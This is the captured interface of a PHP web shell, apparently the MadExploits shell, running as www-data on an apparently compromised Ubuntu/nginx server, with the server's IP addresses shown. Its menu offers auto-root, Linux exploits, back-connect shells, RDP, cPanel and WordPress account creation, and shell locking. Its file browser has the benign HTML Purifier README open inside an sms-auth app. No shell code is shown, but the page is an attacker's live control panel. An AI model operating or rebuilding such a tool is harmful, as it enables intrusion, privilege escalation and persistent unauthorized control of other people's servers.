Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
vendor /
ezyang /
htmlpurifier /
[ HOME SHELL ]
Name
Size
Permission
Action
library
[ DIR ]
drwxrwxr-x
CREDITS
341
B
-rw-rw-r--
LICENSE
25.84
KB
-rw-rw-r--
README.md
1.2
KB
-rw-rw-r--
VERSION
6
B
-rw-rw-r--
composer.json
792
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
HTML Purifier [](http://travis-ci.org/ezyang/htmlpurifier) ============= HTML Purifier is an HTML filtering solution that uses a unique combination of robust whitelists and aggressive parsing to ensure that not only are XSS attacks thwarted, but the resulting HTML is standards compliant. HTML Purifier is oriented towards richly formatted documents from untrusted sources that require CSS and a full tag-set. This library can be configured to accept a more restrictive set of tags, but it won't be as efficient as more bare-bones parsers. It will, however, do the job right, which may be more important. Places to go: * See INSTALL for a quick installation guide * See docs/ for developer-oriented documentation, code examples and an in-depth installation guide. * See WYSIWYG for information on editors like TinyMCE and FCKeditor HTML Purifier can be found on the web at: [http://htmlpurifier.org/](http://htmlpurifier.org/) ## Installation Package available on [Composer](https://packagist.org/packages/ezyang/htmlpurifier). If you're using Composer to manage dependencies, you can use $ composer require ezyang/htmlpurifier
Close